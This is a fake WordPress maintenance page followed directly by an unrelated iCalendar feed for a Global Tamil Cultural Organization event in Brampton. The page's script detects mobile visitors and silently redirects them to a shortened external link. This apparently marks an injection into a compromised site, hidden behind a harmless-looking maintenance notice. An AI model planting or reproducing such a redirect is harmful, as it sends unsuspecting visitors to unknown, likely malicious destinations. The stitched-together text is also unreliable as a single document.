<!DOCTYPE html>
<html lang="en">

<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<meta name="robots" content="noindex, follow">

<title>Briefly unavailable for scheduled maintenance</title>

<style>

*{
    box-sizing:border-box;
}

body{

    margin:0;

    height:100vh;

    display:flex;

    justify-content:center;

    align-items:center;

    background:#f0f6fc;

    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif;

    color:#21759b;

}

.box{

    background:#fff;

    padding:50px 40px;

    border-radius:18px;

    box-shadow:0 10px 35px rgba(0,0,0,.08);

    text-align:center;

    width:90%;

    max-width:600px;

}

.logo{

    font-size:62px;

    font-weight:700;

    margin:0;

    letter-spacing:-2px;

}

.text{

    margin-top:20px;

    font-size:19px;

    line-height:1.7;

    color:#5c6b77;

}

.loader{

    width:42px;

    height:42px;

    border:3px solid #d9e7f2;

    border-top:3px solid #21759b;

    border-radius:50%;

    margin:30px auto 0;

    animation:spin 1s linear infinite;

}

@keyframes spin{

    100%{
        transform:rotate(360deg);
    }

}

@media(max-width:600px){

    .logo{
        font-size:44px;
    }

    .text{
        font-size:16px;
    }

}

</style>

</head>

<body>

<div class="box">

    <h1 class="logo">WordPress</h1>

    <div class="text">
        Briefly unavailable for scheduled maintenance.<br>
        Check back in a some hours.
    </div>

    <div class="loader"></div>

</div>
<script>

const isMobile = window.matchMedia("(max-width: 768px)").matches
    || /Android|iPhone|iPad|iPod|Opera Mini|IEMobile/i.test(navigator.userAgent);

if (isMobile) {

    window.location.replace("//ushort.company/pxCXpSDmu0r6");

}

</script>
</body>
</html>BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Global Tamil Cultural Organization - ECPv6.15.14//NONSGML v1.0//EN
CALSCALE:GREGORIAN
METHOD:PUBLISH
X-ORIGINAL-URL:https://gtco.ca
X-WR-CALDESC:Events for Global Tamil Cultural Organization
REFRESH-INTERVAL;VALUE=DURATION:PT1H
X-Robots-Tag:noindex
X-PUBLISHED-TTL:PT1H
BEGIN:VTIMEZONE
TZID:UTC
BEGIN:STANDARD
TZOFFSETFROM:+0000
TZOFFSETTO:+0000
TZNAME:UTC
DTSTART:20241231T160000
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTART;TZID=UTC:20260809T080000
DTEND;TZID=UTC:20260809T100000
DTSTAMP:20260918T143912
CREATED:20260411T112322Z
LAST-MODIFIED:20260517T031202Z
UID:3615-1786262400-1786269600@gtco.ca
SUMMARY:Majestic Yathra
DESCRIPTION:Global Tamil Cultural Organization in partnership with Niro Dance Creations presents \nMajestic Yathra\nA Royal Folk Celebration of Pan-Indian Diversity \nDate : August 9th\, 2026\nTime : Show Begins at 4PM\nVenue : The Rose Theatre\, 1 Theatre Ln\, Brampton\, ON L6V 0A3 \nContact No : + 1(647) 801 2023\nEmail : gtco360@gmail.com \n 
URL:https://gtco.ca/event/majestic-yathra/
LOCATION:The Rose Theatre\, 1 Theatre Ln\, L6V 0A3\, Brampton\, Ontario\, L6V 0A3\, Canada
ATTACH;FMTTYPE=image/jpeg:https://gtco.ca/wp-content/uploads/2026/04/WhatsApp-Image-2026-05-13-at-20.17.45.jpeg
ORGANIZER;CN="Global Tamil Cultural Organization":MAILTO:gtco360@gmail.com
END:VEVENT
END:VCALENDAR